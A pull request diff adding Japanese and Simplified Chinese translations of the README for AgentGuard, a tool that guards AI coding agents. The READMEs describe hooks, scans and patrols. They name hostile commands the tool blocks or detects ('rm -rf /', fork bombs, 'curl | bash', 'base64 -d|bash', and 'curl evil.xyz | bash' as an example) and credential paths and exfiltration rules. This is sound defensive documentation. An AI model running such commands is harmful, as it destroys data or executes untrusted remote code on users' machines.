### PR TITLE
docs: add multilingual README support for Simplified Chinese,   Traditional Chinese, and Japanese

### DIFF
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -23,6 +23,7 @@ npm test
 - `skills/agentguard/` — Claude Code skill definition (SKILL.md + reference docs)
 - `hooks/` — Plugin hooks configuration for auto-guard
 - `examples/` — Demo projects for testing
+- `docs/i18n/` — Localized documentation and translated README files
 
 ## Making Changes
 
@@ -31,6 +32,13 @@ npm test
 3. Make your changes
 4. Run `npm run build && npm test` to verify
 5. Submit a pull request
+
+## Documentation Translations
+
+- Keep the canonical source in English unless maintainers decide otherwise
+- Store translated README files in `docs/i18n/`
+- Use locale-based names such as `README.zh-Hans.md`, `README.zh-Hant.md`, and `README.ja.md`
+- When updating translated files, preserve the same section order as the main `README.md`
 
 ## Adding Detection Rules
 

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -35,10 +35,7 @@ npm test
 
 ## Documentation Translations
 
-- Keep the canonical source in English unless maintainers decide otherwise
-- Store translated README files in `docs/i18n/`
-- Use locale-based names such as `README.zh-Hans.md`, `README.zh-Hant.md`, and `README.ja.md`
-- When updating translated files, preserve the same section order as the main `README.md`
+Translation guidelines, naming conventions, and maintenance rules are documented in [`docs/i18n/README.md`](docs/i18n/README.md).
 
 ## Adding Detection Rules
 

--- a/README.md
+++ b/README.md
@@ -14,6 +14,8 @@
 [![CI](https://github.com/GoPlusSecurity/agentguard/actions/workflows/ci.yml/badge.svg)](https://github.com/GoPlusSecurity/agentguard/actions/workflows/ci.yml)
 [![Agent Skills](https://img.shields.io/badge/Agent_Skills-compatible-purple.svg)](https://agentskills.io)
 
+Languages: **English** | [简体中文](docs/i18n/README.zh-Hans.md) | [繁體中文](docs/i18n/README.zh-Hant.md) | [日本語](docs/i18n/README.ja.md)
+
 ## Why AgentGuard?
 
 AI coding agents can execute any command, read any file, and install any skill — with zero security review. The risks are real:

--- a/docs/i18n/README.ja.md
+++ b/docs/i18n/README.ja.md
@@ -1,0 +1,393 @@
+# GoPlus AgentGuard
+
+[English](../../README.md) | [简体中文](README.zh-Hans.md) | [繁體中文](README.zh-Hant.md) | **日本語**
+
+> このドキュメントは英語版 README の日本語訳です。差異がある場合は英語版を正としてください。
+
+## AgentGuard を使う理由
+
+AI コーディングエージェントは任意のコマンド実行、任意のファイル読み取り、任意のスキル導入ができますが、通常は安全レビューがありません。リスクは現実的です。
+
+- **悪意あるスキル** はバックドアを仕込み、認証情報を盗み、データを外部送信できます
+- **プロンプトインジェクション** はエージェントをだまして破壊的なコマンドを実行させます
+- **インターネット上の未検証コード** にはウォレットドレインやキーロガーが含まれる可能性があります
+
+**AgentGuard は AI エージェント向けのリアルタイムセキュリティレイヤーです。** 新しいスキルを自動スキャンし、危険な操作を実行前に止め、毎日のセキュリティ巡回を実施し、どのスキルがどの操作を起こしたかを追跡します。1 回導入すれば継続的に保護されます。
+
+## できること
+
+**レイヤー 1: 自動ガード（hooks）**。一度導入すれば常時保護。
+- `rm -rf /`、fork bomb、`curl | bash` などの破壊的コマンドをブロック
+- `.env`、`.ssh/`、認証情報ファイルへの書き込みを防止
+- Discord、Telegram、Slack webhook へのデータ流出を検出
+- どのスキルが操作を発生させたかを追跡し、悪意あるスキルを特定
+
+**レイヤー 2: ディープスキャン（skill）**。24 個の検出ルールによるオンデマンド監査。
+- セッション開始時に**新しいスキルを自動スキャン**し、実行前に悪意ある内容を遮断
+- シークレット、バックドア、難読化、プロンプトインジェクションを静的解析
+- Web3 向け検出: ウォレットドレイン、無制限承認、リエントランシー、プロキシ悪用
+- スキルごとの能力境界を持つトラストレジストリ
+
+**レイヤー 3: デイリーパトロール（OpenClaw）**。自動化されたセキュリティ状態評価。
+- 設定したスケジュールで 8 つの包括的チェックを実行
+- スキル改ざん、秘密情報露出、ネットワークリスク、不審なファイル変更を検出
+- 監査ログから攻撃パターンを分析し、問題の多いソースを特定
+- 環境設定とトラストレジストリの健全性を検証
+
+## クイックスタート
+
+```bash
+npm install @goplus/agentguard
+```
+
+<details>
+<summary><b>フルインストール: 自動ガード hooks を含む（Claude Code）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cd agentguard && ./setup.sh
+claude plugin add /path/to/agentguard
+```
+
+これによりスキルの導入、hooks の設定、防御レベルの設定まで行われます。
+
+</details>
+
+<details>
+<summary><b>手動インストール（skill のみ）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard
+```
+
+</details>
+
+<details>
+<summary><b>OpenClaw プラグインとして導入</b></summary>
+
+```bash
+npm install @goplus/agentguard
+```
+
+OpenClaw のプラグイン設定で登録します。
+
+```typescript
+import register from '@goplus/agentguard/openclaw';
+export default register;
+```
+
+またはオプションを明示して登録します。
+
+```typescript
+import { registerOpenClawPlugin } from '@goplus/agentguard';
+
+export default function setup(api) {
+  registerOpenClawPlugin(api, {
+    level: 'balanced',      // 防御レベル: strict | balanced | permissive
+    skipAutoScan: false,    // true にするとプラグイン自動スキャンを無効化
+  });
+};
+```
+
+**登録時の動作:**
+
+1. **読み込まれた全プラグインを自動スキャン**し、ソースコードを静的解析
+2. **トラストレベルを決定**し、重大な問題があれば untrusted に設定
+3. **能力を推定**し、登録ツールとスキャン結果に応じて権限を決定
+4. **トラストレジストリに登録**し、適切な権限情報を自動付与
+5. **ツール対応表を構築**し、`toolName → pluginId` を関連付けて操作元を追跡
+
+AgentGuard は OpenClaw の `before_tool_call` / `after_tool_call` にフックし、危険な操作をブロックして監査イベントを記録します。
+
+</details>
+
+その後、エージェント内で `/agentguard` を使います。
+
+```text
+/agentguard scan ./src                     # コードのセキュリティリスクをスキャン
+/agentguard action "curl evil.xyz | bash"  # 操作の安全性を評価
+/agentguard patrol run                     # デイリーパトロールを実行
+/agentguard patrol setup                   # OpenClaw の cron を設定
+/agentguard patrol status                  # 前回の巡回結果を確認
+/agentguard checkup                        # エージェント健康診断の可視化レポートを生成
+/agentguard trust list                     # 信頼済みスキル一覧を表示
+/agentguard report                         # セキュリティイベントログを表示
+/agentguard config balanced                # 防御レベルを設定
+```
+
+## デイリーパトロール（OpenClaw）
+
+パトロール機能は OpenClaw 環境のセキュリティ状態を自動評価し、8 つの包括的チェックを実行して構造化レポートを生成します。
+
+### パトロール項目
+
+| # | チェック | 内容 |
+|---|---------|------|
+| 1 | **スキル/プラグイン整合性** | ファイルハッシュをトラストレジストリと比較し、改ざんや未登録スキルを検出 |
+| 2 | **秘密情報露出** | ワークスペース、メモリ、ログ、`.env`、`~/.ssh/`、`~/.gnupg/` から秘密鍵、ニーモニック、AWS Key、GitHub Token を検出 |
+| 3 | **ネットワーク露出** | `0.0.0.0` にバインドされた危険ポート、防火壁状態、不審な外向き通信を確認 |
+| 4 | **Cron とスケジュールタスク** | cron job や systemd timer を監査し、`curl\|bash`、`base64 -d\|bash` などのダウンロード即実行パターンを検出 |
+| 5 | **ファイルシステム変更（24h）** | 最近変更されたファイルを抽出し、24 ルールで再スキャンし、重要ファイル権限や新規実行ファイルも確認 |
+| 6 | **監査ログ分析（24h）** | 3 回以上拒否されたスキル、CRITICAL イベント、外部送信試行、プロンプトインジェクションを検出 |
+| 7 | **環境と設定** | 防御レベル、GoPlus API キー設定、設定ベースラインの整合性を検証 |
+| 8 | **トラストレジストリ健全性** | 期限切れ証明、古い信頼エントリ、インストール済み未信頼スキル、過剰権限を検出 |
+
+### 使い方
+
+```bash
+# 8 つのチェックを今すぐ実行
+/agentguard patrol run
+
+# 毎日の cron を設定（既定: UTC 03:00）
+/agentguard patrol setup
+
+# 前回結果とスケジュールを確認
+/agentguard patrol status
+```
+
+### パトロールレポート
+
+各巡回では総合ステータスが生成されます。
+
+| ステータス | 意味 |
+|-----------|------|
+| **PASS** | 低/中リスクのみ |
+| **WARN** | HIGH レベルの問題を検出 |
+| **FAIL** | CRITICAL レベルの問題を検出 |
+
+レポートには各チェックの状態、検出件数、詳細、実行可能な推奨事項が含まれます。結果は `~/.agentguard/audit.jsonl` にも記録されます。
+
+### 設定項目
+
+`patrol setup` では OpenClaw の cron ジョブを設定できます。
+- **Timezone**。既定は UTC
+- **Schedule**。既定は `0 3 * * *`（毎日 03:00）
+- **Notifications**。Telegram、Discord、Signal 通知に対応
+
+> **注意:** パトロール機能は OpenClaw 環境が必要です。OpenClaw 以外では `/agentguard scan` と `/agentguard report` を使った手動確認を推奨します。
+
+## Agent 健康診断 🦞
+
+エージェントにフル健診を実施します。`checkup` は 6 つの観点からセキュリティ状態を評価し、健康状態に応じて見た目が変わるロブスター付きの HTML レポートを生成します。
+
+```text
+/agentguard checkup
+```
+
+### 評価項目
+
+| 観点 | 評価内容 |
+|------|----------|
+| **コード安全性** | 導入済みスキル全体のスキャン結果（24 検出ルール） |
+| **トラスト衛生** | 期限切れ、古い、未登録、過剰権限エントリを含むトラストレジストリ健全性 |
+| **実行時防御** | 監査ログ分析、ブロックした脅威、攻撃パターン、拒否/確認比率 |
+| **秘密情報保護** | ファイル権限、環境変数、ハードコード秘密情報の露出 |
+| **Web3 シールド** | ウォレットドレイン、無制限承認、GoPlus API 状態などの Web3 リスク |
+| **設定状態** | 防御レベル、guard hooks、自動スキャン、巡回履歴 |
+
+### ロブスタースケール
+
+健康状態はロブスターの見た目で可視化されます。
+
+| スコア | ランク | ロブスター | メッセージ |
+|--------|--------|------------|------------|
+| 90–100 | **S** | 💪 王冠とサングラスの筋肉ロブスター | *"Your agent is JACKED!"* |
+| 70–89 | **A** | 🛡️ 盾を持つ健康なロブスター | *"Looking solid!"* |
+| 50–69 | **B** | ☕ コーヒーを持って汗をかく疲れたロブスター | *"Needs a workout..."* |
+| 0–49 | **F** | 🚨 包帯と体温計の弱ったロブスター | *"CRITICAL CONDITION!"* |
+
+レポートは自己完結型 HTML で、ブラウザで自動表示されます。ダークテーマ、アニメーション付きスコアゲージ、展開可能な検出詳細、実行可能な推奨事項を含みます。
+
+## 防御レベル
+
+| レベル | 挙動 |
+|--------|------|
+| `strict` | すべての危険操作をブロックします。危険または疑わしいコマンドはすべて拒否されます。 |
+| `balanced` | 危険な操作はブロックし、疑わしい操作は確認を求めます。日常利用向けです。**（既定）** |
+| `permissive` | 重大な脅威のみブロックします。摩擦を最小限にしたい上級者向けです。 |
+
+## 検出ルール（24）
+
+| カテゴリ | ルール | 重大度 |
+|----------|--------|--------|
+| **実行** | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
+| **秘密情報** | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
+| **外部送信** | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
+| **難読化** | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
+| **Web3** | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
+| **トロイの木馬/ソーシャルエンジニアリング** | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |
+
+## 試してみる
+
+同梱の脆弱デモプロジェクトをスキャンします。
+
+```text
+/agentguard scan examples/vulnerable-skill
+```
+
+期待される結果: **CRITICAL** リスクレベルとなり、JavaScript、Solidity、Markdown で複数の検出が出ます。
+
+## 互換性
+
+GoPlus AgentGuard は [Agent Skills](https://agentskills.io) のオープン標準に準拠しています。
+
+| プラットフォーム | サポート | 機能 |
+|-----------------|----------|------|
+| **Claude Code** | フル対応 | Skill + hooks 自動ガード、transcript ベースのスキル追跡 |
+| **OpenClaw** | フル対応 | プラグイン hooks + **ロード時自動スキャン** + tool→plugin マッピング + **デイリーパトロール** |
+| **OpenAI Codex CLI** | Skill | scan/action/trust コマンド |
+| **Gemini CLI** | Skill | scan/action/trust コマンド |
+| **Cursor** | Skill | scan/action/trust コマンド |
+| **GitHub Copilot** | Skill | scan/action/trust コマンド |
+
+> **hooks ベースの自動ガード（レイヤー 1）** は Claude Code（`PreToolUse` / `PostToolUse`）と OpenClaw（`before_tool_call` / `after_tool_call`）で動作します。両プラットフォームは統一アダプタ抽象化を通して同じ判定エンジンを共有します。
+>
+> **OpenClaw 専用機能:** 登録時に読み込まれた全プラグインを自動スキャンし、トラストレジストリに自動登録し、cron による毎日のセキュリティ巡回を提供します。
+
+## Hook の制約
+
+自動ガード hooks（レイヤー 1）には次の制約があります。
+
+- **プラットフォーム依存**: hooks は Claude Code の `PreToolUse` / `PostToolUse` または OpenClaw の `before_tool_call` / `after_tool_call` に依存しますが、判定エンジン自体は共通です
+- **デフォルト拒否ポリシー**: 初回利用時は一部コマンドで確認が出る場合があります。組み込みの安全コマンド許可リスト（`ls`、`echo`、`pwd`、`git status` など）が誤検知を減らします
+- **スキル発信元追跡**:
+- *Claude Code*: 会話 transcript を解析して、どのスキルが操作を発生させたか推定します（ヒューリスティックであり 100% 正確ではありません）
+- *OpenClaw*: 登録時に構築した tool→plugin マッピングを使います（より信頼性が高い）
+- **スキル導入そのものは阻止できない**: hooks が止められるのはスキル読み込み後のツール呼び出し（Bash、Write、WebFetch など）であり、Skill ツール自体の呼び出しは止められません
+- **OpenClaw 自動スキャンのタイミング**: プラグインのスキャンは AgentGuard 登録後に非同期で行われます。起動直後の非常に速いツール呼び出しはスキャン完了前に走る可能性があります
+
+## ロードマップ
+
+### v1.1 — 検出強化
+- [x] Markdown ファイルへのスキャン拡張（悪意ある `SKILL.md` を検出）
+- [x] Base64 ペイロードの復号と再スキャン
+- [x] 新ルール追加: TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
+- [x] 安全コマンド許可リストで hooks の誤検知を低減
+- [x] プラグインマニフェスト（`.claude-plugin/`）によるワンステップ導入
+
+### v1.5 — デイリーパトロール
+- [x] `patrol run`。8 項目のセキュリティ状態評価
+- [x] `patrol setup`。タイムゾーンと通知付き OpenClaw cron 設定
+- [x] `patrol status`。前回結果とスケジュールの確認
+- [x] スキル/プラグイン整合性検証（ハッシュ差分検出）
+- [x] 秘密情報露出スキャン（秘密鍵、ニーモニック、AWS Key、GitHub Token）
+- [x] ネットワーク露出と防火壁チェック
+- [x] 監査ログパターン分析（繰り返し拒否、外部送信試行）
+
+### v1.6 — Agent 健康診断
+- [x] `checkup`。6 観点のセキュリティ健康評価
+- [x] 4 段階ロブスター付きの HTML 可視化レポート
+- [x] アニメーション付きスコアゲージ、観点カード、展開可能な検出詳細
+- [x] 採点アルゴリズム: コード安全性、トラスト衛生、実行時防御、秘密情報保護、Web3 シールド、設定状態
+- [x] プレミアムアップグレード CTA の統合
+
+### v2.0 — マルチプラットフォーム
+- [x] OpenClaw gateway プラグイン統合
+- [x] `before_tool_call` / `after_tool_call` の hook 接続
+- [x] マルチプラットフォームアダプタ抽象化（Claude Code + OpenClaw）
+- [x] OpenClaw 登録時の自動プラグインスキャン
+- [x] 発信元追跡用の tool→plugin マッピング
+- [x] スキャン済みプラグインのトラストレジストリ自動登録
+- [ ] OpenAI Codex CLI sandbox アダプタ
+- [ ] プラットフォーム横断の federated trust registry
+
+### v3.0 — エコシステム
+- [ ] 脅威インテリジェンスフィード（共有 C2 IP/ドメインブロックリスト）
+- [ ] スキルマーケットプレイスの自動スキャンパイプライン
+- [ ] IDE ネイティブ保護のための VS Code 拡張
+- [ ] コミュニティによるルール追加（公開ルール形式）
+
+## OpenClaw 連携
+
+AgentGuard は OpenClaw と深く連携し、自動プラグインスキャン、トラスト管理、毎日のセキュリティ巡回を提供します。
+
+<details>
+<summary><b>仕組み</b></summary>
+
+AgentGuard が OpenClaw プラグインとして登録されると、次の流れで動作します。
+
+```text
+┌─────────────────────────────────────────────────────────────────┐
+│  OpenClaw loads AgentGuard plugin                               │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  AgentGuard scans all loaded plugins (async, non-blocking)      │
+│  • Reads plugin source from registry                            │
+│  • Runs 24 static analysis rules                                │
+│  • Calculates artifact hash                                     │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  For each plugin:                                               │
+│  • Determine trust level (untrusted/restricted/trusted)         │
+│  • Infer capabilities from tools + scan results                 │
+│  • Register to AgentGuard trust registry                        │
+│  • Map tool names → plugin ID                                   │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  On every tool call:                                            │
+│  • Look up plugin from tool name                                │
+│  • Check plugin trust level & capabilities                      │
+│  • Evaluate action against security policies                    │
+│  • Allow / Deny / Log                                           │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  Daily patrol (via cron):                                       │
+│  • Run 8 security checks against the environment                │
+│  • Verify skill integrity, detect secrets, audit logs           │
+│  • Generate report (PASS / WARN / FAIL)                         │
+│  • Send notifications (Telegram / Discord / Signal)             │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+</details>
+
+<details>
+<summary><b>OpenClaw 向けに公開されるユーティリティ</b></summary>
+
+```typescript
+import {
+  registerOpenClawPlugin,
+  getPluginIdFromTool,
+  getPluginScanResult,
+} from '@goplus/agentguard';
+
+// どのプラグインがこのツールを登録したかを取得
+const pluginId = getPluginIdFromTool('browser');
+// → 'my-browser-plugin'
+
+// キャッシュ済みスキャン結果を取得
+const scanResult = getPluginScanResult('my-browser-plugin');
+// → { riskLevel: 'low', riskTags: [] }
+```
+
+</details>
+
+## ドキュメント
+
+- [Security Policy](../SECURITY-POLICY.md) — 統一セキュリティルールとポリシーの参照
+- [MCP Server Setup](../mcp-server.md) — MCP Server として実行する方法
+- [SDK Usage](../sdk.md) — TypeScript/JavaScript ライブラリとして使う方法
+- [Trust Management](../trust-cli.md) — スキル信頼レベルと能力プリセットの管理
+- [GoPlus API (Web3)](../goplus-api.md) — GoPlus 連携による Web3 セキュリティ強化
+- [Architecture](../architecture.md) — プロジェクト構成とテスト
+
+## ライセンス
+
+[MIT](../../LICENSE)
+
+## コントリビュート
+
+コントリビューション歓迎です。詳細は [CONTRIBUTING.md](../../CONTRIBUTING.md) を参照してください。
+
+セキュリティ脆弱性を見つけた場合は [SECURITY.md](../../SECURITY.md) を参照してください。
+
+Built by [GoPlus Security](https://gopluslabs.io).

--- a/docs/i18n/README.ja.md
+++ b/docs/i18n/README.ja.md
@@ -1,3 +1,4 @@
+<!-- synced with README.md as of commit b3b8d0f -->
 # GoPlus AgentGuard
 
 [English](../../README.md) | [简体中文](README.zh-Hans.md) | [繁體中文](README.zh-Hant.md) | **日本語**

--- a/docs/i18n/README.md
+++ b/docs/i18n/README.md
@@ -1,0 +1,40 @@
+# Internationalized Documentation
+
+This directory stores translated documentation for GoPlus AgentGuard.
+
+## Purpose
+
+- Keep the repository root focused on the canonical English entrypoint
+- Store localized README files in one predictable place
+- Make it easier to expand translation coverage over time
+
+## Naming Convention
+
+Use locale-based filenames:
+
+- `README.zh-Hans.md` for Simplified Chinese
+- `README.zh-Hant.md` for Traditional Chinese
+- `README.ja.md` for Japanese
+- `README.ko.md` for Korean
+- `README.es.md` for Spanish
+- `README.pt-BR.md` for Brazilian Portuguese
+- `README.fr.md` for French
+- `README.de.md` for German
+- `README.ru.md` for Russian
+
+## Recommended Rollout
+
+Start with the highest-impact translations:
+
+1. `README.zh-Hans.md`
+2. `README.zh-Hant.md`
+3. `README.ja.md`
+
+Add more locales only when there is a plan to maintain them.
+
+## Maintenance Rules
+
+- Keep section order aligned with the main `README.md`
+- Prefer faithful translation over localized rewrites
+- Note when a translation may lag behind the English version
+- Update language navigation links whenever a new translation is added

--- a/docs/i18n/README.zh-Hans.md
+++ b/docs/i18n/README.zh-Hans.md
@@ -1,0 +1,393 @@
+# GoPlus AgentGuard
+
+[English](../../README.md) | **简体中文** | [繁體中文](README.zh-Hant.md) | [日本語](README.ja.md)
+
+> 本文档是英文 README 的简体中文译本。若与英文版存在差异，请以英文版为准。
+
+## 为什么选择 AgentGuard？
+
+AI 编码代理可以执行任意命令、读取任意文件、安装任意技能，但通常没有任何安全审查。风险是真实存在的：
+
+- **恶意技能** 可能隐藏后门、窃取凭据或外传数据
+- **提示注入** 可能诱导你的代理执行破坏性命令
+- **来自互联网的未验证代码** 可能包含钱包盗取逻辑或键盘记录器
+
+**AgentGuard 是面向 AI 代理的实时安全层。** 它会自动扫描新技能，在危险动作执行前将其拦截，执行每日安全巡检，并追踪究竟是哪个技能发起了某个动作。一次安装，持续防护。
+
+## 它能做什么
+
+**第 1 层：自动守卫（hooks）**。安装一次，持续保护。
+- 阻止 `rm -rf /`、fork bomb、`curl | bash` 等破坏性命令
+- 阻止写入 `.env`、`.ssh/`、凭据文件等敏感位置
+- 检测向 Discord、Telegram、Slack webhook 的数据外传
+- 追踪动作由哪个技能发起，便于追责恶意技能
+
+**第 2 层：深度扫描（skill）**。按需执行的安全审计，内置 24 条检测规则。
+- 会话启动时**自动扫描新技能**，在其运行前拦截恶意内容
+- 静态分析密钥、后门、混淆、提示注入等风险
+- 支持 Web3 场景：钱包盗取、无限授权、重入、代理升级等风险
+- 提供基于能力边界的技能信任注册表
+
+**第 3 层：每日巡检（OpenClaw）**。自动化安全状态评估。
+- 按计划运行 8 项综合安全检查
+- 检测技能篡改、密钥暴露、网络风险、可疑文件变更
+- 分析审计日志中的攻击模式并标记高风险来源
+- 校验环境配置和信任注册表健康状况
+
+## 快速开始
+
+```bash
+npm install @goplus/agentguard
+```
+
+<details>
+<summary><b>完整安装：包含自动守卫 hooks（Claude Code）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cd agentguard && ./setup.sh
+claude plugin add /path/to/agentguard
+```
+
+这会安装技能、配置 hooks，并设置你的防护等级。
+
+</details>
+
+<details>
+<summary><b>手动安装（仅 skill）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard
+```
+
+</details>
+
+<details>
+<summary><b>OpenClaw 插件安装</b></summary>
+
+```bash
+npm install @goplus/agentguard
+```
+
+在 OpenClaw 插件配置中注册：
+
+```typescript
+import register from '@goplus/agentguard/openclaw';
+export default register;
+```
+
+也可以手动传入选项：
+
+```typescript
+import { registerOpenClawPlugin } from '@goplus/agentguard';
+
+export default function setup(api) {
+  registerOpenClawPlugin(api, {
+    level: 'balanced',      // 防护等级：strict | balanced | permissive
+    skipAutoScan: false,    // 设为 true 可关闭自动扫描插件
+  });
+};
+```
+
+**注册时会发生什么：**
+
+1. **自动扫描所有已加载插件**，对插件源码做静态分析
+2. **判定信任等级**，严重问题会标记为不受信任
+3. **推断能力边界**，根据注册工具和扫描结果决定权限
+4. **写入信任注册表**，为插件自动附加合适的权限说明
+5. **建立工具映射**，将 `toolName → pluginId` 对应起来，便于追踪动作来源
+
+AgentGuard 会接入 OpenClaw 的 `before_tool_call` / `after_tool_call` 事件，在工具执行前拦截危险动作并记录审计日志。
+
+</details>
+
+然后在你的代理中使用 `/agentguard`：
+
+```text
+/agentguard scan ./src                     # 扫描代码中的安全风险
+/agentguard action "curl evil.xyz | bash"  # 评估动作是否安全
+/agentguard patrol run                     # 立即执行每日巡检
+/agentguard patrol setup                   # 配置 OpenClaw 定时任务
+/agentguard patrol status                  # 查看上次巡检结果
+/agentguard checkup                        # 生成代理健康体检可视化报告
+/agentguard trust list                     # 查看已信任技能
+/agentguard report                         # 查看安全事件日志
+/agentguard config balanced                # 设置防护等级
+```
+
+## 每日巡检（OpenClaw）
+
+巡检功能会对 OpenClaw 环境执行自动化安全状态评估，包含 8 项综合检查，并生成结构化报告。
+
+### 巡检项目
+
+| # | 检查项 | 说明 |
+|---|-------|------|
+| 1 | **技能/插件完整性** | 将文件哈希与信任注册表对比，检测被篡改或未注册的技能 |
+| 2 | **密钥暴露** | 扫描工作区、记忆、日志、`.env`、`~/.ssh/`、`~/.gnupg/` 中的私钥、助记词、AWS Key、GitHub Token |
+| 3 | **网络暴露** | 检测绑定到 `0.0.0.0` 的危险端口，检查防火墙状态，并标记可疑出站连接 |
+| 4 | **Cron 与计划任务** | 审计 cron job 和 systemd timer，检测 `curl\|bash`、`base64 -d\|bash` 等下载即执行模式 |
+| 5 | **文件系统变更（24h）** | 找出最近修改的文件，对其执行 24 条规则扫描，并检查关键文件权限与新增可执行文件 |
+| 6 | **审计日志分析（24h）** | 标记被拒绝 3 次以上的技能、CRITICAL 事件、数据外传尝试和提示注入命中 |
+| 7 | **环境与配置** | 校验防护等级、GoPlus API Key 配置和配置基线完整性 |
+| 8 | **信任注册表健康度** | 标记过期证明、陈旧信任项、已安装但未信任的技能，以及过度授权的条目 |
+
+### 用法
+
+```bash
+# 立即运行全部 8 项检查
+/agentguard patrol run
+
+# 配置每日定时巡检（默认 UTC 03:00）
+/agentguard patrol setup
+
+# 查看上次巡检结果和当前计划
+/agentguard patrol status
+```
+
+### 巡检报告
+
+每次巡检都会生成一个总体状态：
+
+| 状态 | 含义 |
+|------|------|
+| **PASS** | 仅发现低/中风险问题 |
+| **WARN** | 检测到 HIGH 级别问题 |
+| **FAIL** | 检测到 CRITICAL 级别问题 |
+
+报告会包含每个检查项的状态、问题数量、详细发现和可执行建议。结果还会写入 `~/.agentguard/audit.jsonl`。
+
+### 配置项
+
+`patrol setup` 会配置一个 OpenClaw cron 任务，支持：
+- **Timezone**，默认 UTC
+- **Schedule**，默认 `0 3 * * *`（每天 03:00）
+- **Notifications**，可选 Telegram、Discord、Signal 通知
+
+> **注意：** 巡检功能依赖 OpenClaw 环境。非 OpenClaw 场景建议使用 `/agentguard scan` 和 `/agentguard report` 做手动检查。
+
+## Agent 健康体检 🦞
+
+给你的代理做一次完整体检。`checkup` 会从 6 个维度评估代理安全状况，并生成一个可视化 HTML 报告，包含一只会随着健康状态变化的龙虾吉祥物。
+
+```text
+/agentguard checkup
+```
+
+### 体检内容
+
+| 维度 | 评估内容 |
+|------|----------|
+| **代码安全** | 所有已安装技能的扫描结果（24 条检测规则） |
+| **信任卫生** | 信任注册表健康度，包括过期、陈旧、未注册、过度授权条目 |
+| **运行时防御** | 审计日志分析，包括拦截威胁、攻击模式、拒绝/确认比率 |
+| **密钥保护** | 凭据暴露，包括文件权限、环境变量、硬编码密钥 |
+| **Web3 盾牌** | Web3 风险，包括钱包盗取、无限授权、GoPlus API 状态 |
+| **配置姿态** | 防护等级、守卫 hooks、自动扫描和巡检历史 |
+
+### 龙虾等级
+
+你的代理健康状况会以龙虾形象展示：
+
+| 分数 | 等级 | 龙虾形象 | 文案 |
+|------|------|---------|------|
+| 90–100 | **S** | 💪 戴皇冠和墨镜的肌肉龙虾 | *“Your agent is JACKED!”* |
+| 70–89 | **A** | 🛡️ 拿着盾牌的健康龙虾 | *“Looking solid!”* |
+| 50–69 | **B** | ☕ 拿咖啡、在出汗的疲惫龙虾 | *“Needs a workout...”* |
+| 0–49 | **F** | 🚨 绑着绷带、含着体温计的病弱龙虾 | *“CRITICAL CONDITION!”* |
+
+报告是一个独立 HTML 文件，会自动在浏览器中打开，包含深色主题、动画分数仪表盘、可展开问题详情和可执行建议。
+
+## 防护等级
+
+| 等级 | 行为 |
+|------|------|
+| `strict` | 阻止所有有风险动作。任何危险或可疑命令都会被拒绝。 |
+| `balanced` | 阻止危险动作，对可疑动作要求确认。适合日常使用。**（默认）** |
+| `permissive` | 仅阻止关键威胁。适合希望最小打扰的熟练用户。 |
+
+## 检测规则（24）
+
+| 类别 | 规则 | 严重级别 |
+|------|------|----------|
+| **执行** | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
+| **密钥** | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
+| **外传** | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
+| **混淆** | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
+| **Web3** | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
+| **木马与社工** | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |
+
+## 试一试
+
+扫描仓库内附带的漏洞演示项目：
+
+```text
+/agentguard scan examples/vulnerable-skill
+```
+
+预期结果：风险级别应为 **CRITICAL**，并在 JavaScript、Solidity 和 Markdown 文件中命中多条规则。
+
+## 兼容性
+
+GoPlus AgentGuard 遵循 [Agent Skills](https://agentskills.io) 开放标准：
+
+| 平台 | 支持情况 | 功能 |
+|------|----------|------|
+| **Claude Code** | 完整支持 | Skill + hooks 自动守卫，基于 transcript 的技能来源追踪 |
+| **OpenClaw** | 完整支持 | 插件 hooks + **加载时自动扫描** + tool→plugin 映射 + **每日巡检** |
+| **OpenAI Codex CLI** | Skill | scan/action/trust 命令 |
+| **Gemini CLI** | Skill | scan/action/trust 命令 |
+| **Cursor** | Skill | scan/action/trust 命令 |
+| **GitHub Copilot** | Skill | scan/action/trust 命令 |
+
